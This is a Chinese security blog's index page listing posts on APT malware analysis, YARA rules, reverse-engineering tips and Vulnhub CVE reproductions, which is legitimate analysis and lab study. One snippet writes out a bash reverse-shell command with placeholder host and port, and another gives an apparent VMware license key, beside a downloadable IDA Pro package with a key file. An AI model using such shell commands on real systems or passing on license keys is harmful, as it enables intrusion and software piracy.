自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(96)
  • 资源 (4)
  • 收藏
  • 关注

原创 从9年隐身的XDSpy分析总结多组件的恶意载荷

报告的总结部分复制过来

2020-12-03 11:06:39 16

原创 我和StrongPity那些事,APT溯源与追踪-上

组件分析历史样本累积

2020-12-03 11:05:36 4

原创 我和StrongPity那些事,APT溯源与追踪-下

预测和规则发现

2020-12-03 11:05:04 3

原创 职场碎碎念

白帽汇赵武

2020-12-03 10:43:23 6

原创 隐身9年的俄罗斯APT组织XDSpy及其XDDown攻击链分析

样本分析投递手法 - 钓鱼邮件+恶意附件压缩包通过钓鱼邮件投递针对俄罗斯,以失物认领为主题的武器化PPSX格式的附件,诱骗收件人下载打开,打开后会执行JS脚本“MicrosoftPowerPoint.js”,释放并执行PE文件。执行流程样本详细分析钓鱼邮件恶意附件PPSX由于PPSX格式的攻击载荷比较少见,此处简单介绍一下该格式与PPTX格式的区别:PPTX:普通可编辑模式。打开后呈现的页面就是可编辑的页面,要播放需要单击播放按钮才能全屏播放。PPSX:放映格式。打开后直接就是全屏放映,没法

2020-12-01 20:19:07 48 1

原创 双尾蝎后门程序

样本分析投递手法通过钓鱼邮件投递以IT从业者简历为主题的可执行文件,该文件通过长文件名+WORD图标的方式,伪装为文档诱骗收件人下载打开。执行流程样本详细分析该Delphi可执行文件运行后会通过窗体TForm1类中设置的3个按钮控件和4个计时器控件的响应事件,执行对应功能,如截图,下载文件,执行Shell代码等。执行Timer后根据执行结果,杀死以及设置/新建Timer控制逻辑,下文不再赘述:Time1释放掩饰文档首先被执行的是Time1,用来释放掩饰文档以及进入Button2控件的响应事件

2020-12-01 19:30:18 33

原创 网银木马TrickBot的分析调试笔记

Trickbot描述Trickbot是2016年出现的一种网银木马,它以大银行的客户为目标,窃取他们的信息。自出现以来,新的变体不断出现,每次都有新的技巧和模块更新。Trickbot是一种模块化恶意软件,包括针对其恶意活动的不同模块。主要功能包括从浏览器中窃取数据、从Microsoft Outlook窃取数据、锁定受害者的计算机、系统信息收集、网络信息收集和域凭据窃取等模块等.由于此家族出现至今已四年,公开的报告众多,此处不多描述初始载荷,以调试分析Trickbot功能载荷(本次分析的是1000511

2020-12-01 10:39:28 33

原创 Yara编写规则

官方指导说明下载地址rule Bitter:Downloader_Net{ meta: description = "Bitter_Downloader_Net" thread_level = 3 in_the_wild = true strings: $string1 = "ClientStatusCheck" ascii $string2 = "Touch_And_Fetch" ascii $string3 = "Touch_And_Update" ascii $

2020-09-16 10:14:50 33

原创 Cobalt Strike - Beacon信标快速分析

流程为:宏代码释放的dll→exe加载的.dll(常见的白加黑)→解密ShellCode2的ShellCode1→ShellCode2→下载文件到本地宏代码释放Dll1,并执行其导出函数Dll1有80+MB没法跟:宏代码执行Dll1的导出函数后,通过动态可以看到,最后会释放白加黑的exe和dll,所以基本不跟。白加黑的Dll2执行后通过VirtualAlloc申请一段内存空间,然后写入将要执行的ShellCode1。首先在VirtualAlloc下断点,bp VirtualAlloc:然后

2020-08-04 15:41:32 103

原创 Gamaredon样本分析

Gamaredon样本分析一级标题二级标题一级标题内容二级标题内容

2020-05-21 17:44:15 98

原创 IDA调试小技巧

IDA脚本MakeNameEXIDA官方链接实际运用MakeNameEXMakeNameEx(long ea, string name, long flags=SN_CHECK);ea - linear addressname - new name of address. If name == "", then delete old nameflags - combination of SN_... constants解释:MakeNameEx(函数地址,“函数名称”,函数flags);示例

2020-05-19 09:31:58 165

原创 Shellcode分析 - 加密后的函数地址

2020-04-09 18:03:39 89

转载 VMware 15.1解决WIN10 1903复制文件到虚拟机卡死问题

文章目录WIN10升级后使用VMware拖拽文件到虚拟机卡死原因解决办法结果WIN10升级后使用VMware拖拽文件到虚拟机卡死原因Win10版本1903,低于15.1版本的VMware,复制文件会卡死解决办法升级到VMware到15.1之后版本VMware下载链接和15.X的许可证密钥CG392-4PX5J-H816Z-HYZNG-PQRG2结果我升级到15.5.2之后解决复制...

2020-04-02 15:51:09 1855

原创 逆向 - TEB线程环境块

遇到代码v1 = *(_DWORD *)(__readfsdword(0x18) + 4)偏移内容0x0SEH链表指针0x4线程堆栈顶部(地址最小)0x8线程堆栈底部(地址最大)0xCSubSystemTib0x10FiberData0x14ArbitraryUserPointer0x18FS段寄存器在内存中的镜像0x2...

2020-03-31 16:32:36 157

转载 逆向面试常见问题(陆续更新ing)

资料收集与网络(点击对应标题有原帖地址)PE怎么判断PE是DLL,还是EXE文件值属性加载基址怎么判断PE文件是32位还是64位PE加载过程基础Windows下的调用约定通用寄存器有哪些?段存器怎么找到函数地址调试与反调试INT3INT 3 指令Intel的手册INT 3 中断调试处理流程Windows反调试有哪些?反调试技术总结一、探测Windows调试器1.使用Windows API2.手动检...

2020-03-14 20:50:53 706

转载 病毒分析 - 特征码提取

资料收集与网络(点击对应标题有原帖地址)特征码什么是特征码[病毒特征码查杀之基本原理 - 怎么提取特征码](https://blog.csdn.net/ioio_jy/article/details/51198544)1、计算校验和2、提取特征字符串特征码什么是特征码程序运行时,在内存中为完成特定的动作,要有特殊的指令,一个程序在运行时,同一内存地址的指令是相同的同一个程序中,一段连续的地址...

2020-03-14 20:20:19 615

转载 Burp Suite - Intruder暴力破解模块的4种攻击类型

Intruder标签下有四种攻击方式词典Sniper(狙击手模式)Battering Ram(攻城锤模式)Pitchfork(草叉模式)Cluster Bomb(集束炸弹模式)转载自https://www.cnblogs.com/Kevin-1967/p/7762661.html词典假设有用户名和密码两个positionpositionposition,词典分别如下:user1,user2...

2020-02-27 23:41:34 1432

翻译 GetLastErr返回值ErrCode的宏定义以及含义

参考链接:https://docs.microsoft.com/en-us/previous-versions/aa911366(v=msdn.10)?redirectedfrom=MSDN十进制十六进制宏定义中文解释10x1ERROR_INVALID_FUNCTION功能不正确20x2ERROR_FILE_NOT_FOUND系统找不到指定的文件3...

2019-12-16 16:39:07 818

原创 POC - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

安装010Editer下载链接:http://www.pc6.com/softview/SoftView_55129.html复制POC的十六进制00 03 00 00 00 01 00 00 00 00 00 00 00 01 11 0A07 47 6F 72 67 2E 61 70 61 63 68 65 2E 61 78 6973 32 2E 75 74 69 6C 2E 4D 6...

2019-10-16 16:58:19 671

转载 Pipe管道通信 - 实现同一局域网内通信

同一局域网内Pipe管道通信代码借鉴服务端NamePipeServer.hNamePipeServer.cpp客户端NamePipeClient.hNamePipeClient.cppVS内的项目pipeName in ServerpipeName in ClientPipe链接同一局域网内的Pipe通信代码借鉴https://www.cnblogs.com/cxq0017/p/6525027...

2019-08-12 17:09:53 565

转载 利用Vulnhub复现漏洞 - Nginx 配置错误导致漏洞

Nginx 配置错误导致漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现nginx.confMistake 1\. CRLF注入漏洞Mistake 2\. 目录穿越漏洞Mistake 3\. add_header被覆盖Vulnhub官方复现教程https://vulhub.org/#/environments/nginx/insecure-configuration/漏洞原理...

2019-07-15 16:53:55 499

原创 利用Vulnhub复现漏洞 - Nginx越界读取缓存漏洞(CVE-2017-7529)

Nginx越界读取缓存漏洞(CVE-2017-7529)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/nginx/CVE-2017-7529/漏洞原理Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP...

2019-07-15 11:03:23 2076

原创 利用Vulnhub复现漏洞 - Nginx 文件名逻辑漏洞(CVE-2013-4547)

Nginx 文件名逻辑漏洞(CVE-2013-4547)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/nginx/CVE-2013-4547/漏洞原理影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7参考链接:http://cve.mitre.or...

2019-07-12 18:00:38 392

原创 利用Vulnhub复现漏洞 - Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发送请求Vulnhub官方复现教程https://vulhub.org/#/environments/nexus/CVE-2019-7238/漏洞原理Nexus Repository Manage...

2019-07-12 16:55:21 1796 1

原创 利用Vulnhub复现漏洞 - Mysql 身份认证绕过漏洞(CVE-2012-2122)

Mysql 身份认证绕过漏洞(CVE-2012-2122)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/mysql/CVE-2012-2122/漏洞原理当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也...

2019-07-12 16:34:18 1433

原创 利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778)

mini_httpd任意文件读取漏洞(CVE-2018-18778)Vulnhub官方复现教程漏洞原理复现过程启动环境端口设置浏览器设置BurpSuit设置漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/mini_httpd/CVE-2018-18778/漏洞原理Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下...

2019-07-12 16:26:04 1306

原创 利用Vulnhub复现漏洞 - Magento 2.2 SQL注入漏洞

Magento 2.2 SQL注入漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现登录管理员账号使用POC读取管理员的session原理理解端口设置浏览器设置BurpSuit设置Vulnhub官方复现教程https://vulhub.org/#/environments/magento/2.2-sqli/漏洞原理Magento(麦进斗)是一款新的专业开源电子商务平台,采用ph...

2019-07-12 16:12:52 906

原创 利用Vulnhub复现漏洞 - Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/log4j/CVE-2017-5645/漏洞原理Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log...

2019-07-12 14:02:25 2443

原创 利用Vulnhub复现漏洞 - libssh 服务端权限认证绕过漏洞(CVE-2018-10933)

libssh 服务端权限认证绕过漏洞(CVE-2018-10933)Vulnhub官方复现教程漏洞原理复现过程启动环境PoC (pocsuite 插件)执行任意命令Vulnhub官方复现教程https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-cn.md漏洞原理libssh是一个提供ssh相...

2019-07-12 13:38:16 993

原创 利用Vulnhub复现漏洞 - Jupyter Notebook 未授权访问漏洞

Jupyter Notebook 未授权访问漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现我滴个神呀Vulnhub官方复现教程https://vulhub.org/#/environments/jupyter/notebook-rce/漏洞原理Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。...

2019-07-12 11:11:23 1402

原创 利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

@[TOC](Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境)Vulnhub官方复现教程https://vulhub.org/#/environments/joomla/CVE-2017-8917/漏洞原理com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何...

2019-07-12 10:51:35 1876

原创 利用Vulnhub复现漏洞 - Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)

Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现并未成功POCVulnhub官方复现教程https://vulhub.org/#/environments/joomla/CVE-2015-8562/漏洞原理本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而...

2019-07-11 18:01:50 1296

原创 利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)

Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现利用ysoserial检查结果Vulnhub官方复现教程https://vulhub.org/#/environments/jmeter/CVE-2018-1297/漏洞原理Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编...

2019-07-11 17:04:03 1472

原创 利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞(CVE-2018-1000861)

Jenkins远程命令执行漏洞(CVE-2018-1000861)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现POC检验Vulnhub官方复现教程https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/漏洞原理Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这...

2019-07-11 16:51:22 3486

原创 利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现生成序列化字符串发送数据包,执行命令检验Vulnhub官方复现教程https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/漏洞原理参考阅读 https://blogs.securiteam.com/...

2019-07-11 16:00:46 1684 4

原创 利用Vulnhub复现漏洞 - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现发送POC通过命令通过`BurpSuit`发送检测POC是否成功Vulnhub官方复现教程https://vulhub.org/#/environments/jboss/CVE-2017-7504/漏洞原理Red Hat JBoss Applica...

2019-07-11 14:19:14 1280

原创 Linux下的渗透命令学习 - 反弹Shell

反弹ShellShell最常见命令和原理监听命令Shell最常见命令和原理bash -i >& /dev/tcp/ip/port 0>&1bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,>&amp...

2019-07-11 10:25:46 213

原创 ysoserial - payload无效 | 请使用CMD生成POC

ysoserial请使用CMD生成POCPOC文件Powershell下的POC文件CMD下的POC文件不同处在复现利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞时,完全按步骤操作,但是POC一直不能成功执行以为是HTTP请求头/命令有问题,一直试一直改,包括生成POC的命令,因为ysoserial的参数CommonsCollections有的是1...

2019-07-10 18:02:53 821

原创 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

JBoss JMXInvokerServlet 反序列化漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境端口设置浏览器设置BurpSuit设置复现漏洞序列化数据生成发送POCEXPVulnhub官方复现教程https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/漏洞原理这是经典的JBoss反序...

2019-07-10 17:54:36 1846 2

原创 利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞(CVE-2017-7525)

Jackson-databind 反序列化漏洞(CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485Vulnhub官方复现教程https://vulhub.org/#/environments/jackson/CVE-2017-7525/漏洞原理Jackson-da...

2019-07-10 15:00:08 6310 1

Themida脱壳.rar

Themida脱壳脚本:https://www.52pojie.cn/thread-290732-1-1.html

2020-07-20

GetLastError.xlsx

GetLastError的返回值,十进制,十六进制,宏定义,中文解释 如有遗失或者错误,请理解 参考链接:https://docs.microsoft.com/en-us/previous-versions/aa911366(v=msdn.10)?redirectedfrom=MSDN

2019-12-16

IDA.Pro.v7.2 - Part2.rar

以上材料仅供学习交流使用,严禁用于任何商业目的和途径。 WIN7的32位系统只能安装IDA6.8,64位可以安装V7+ 由于文件大小限制,Part1为:x64_idapronw_hexx64w_181105_de455c480e11ef1ec91473028f4dd175.exe Part2为:IDAPRO7.2_ESET_KEY.key+hexrays_sdk+idasdk72

2019-07-05

de4dot-Reactor5.0 By ddk313.rar

有一些软件其中可能是拖壳不干净,但是程序脱壳后,能够运行的话,分析基本都是明码了,加壳的部分应该不影响程序源码的分析。 使用方式可参考:https://blog.csdn.net/JiangBuLiu/article/details/94721590 GitHub下载地址:https://github.com/0xd4d/de4dot

2019-07-05

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除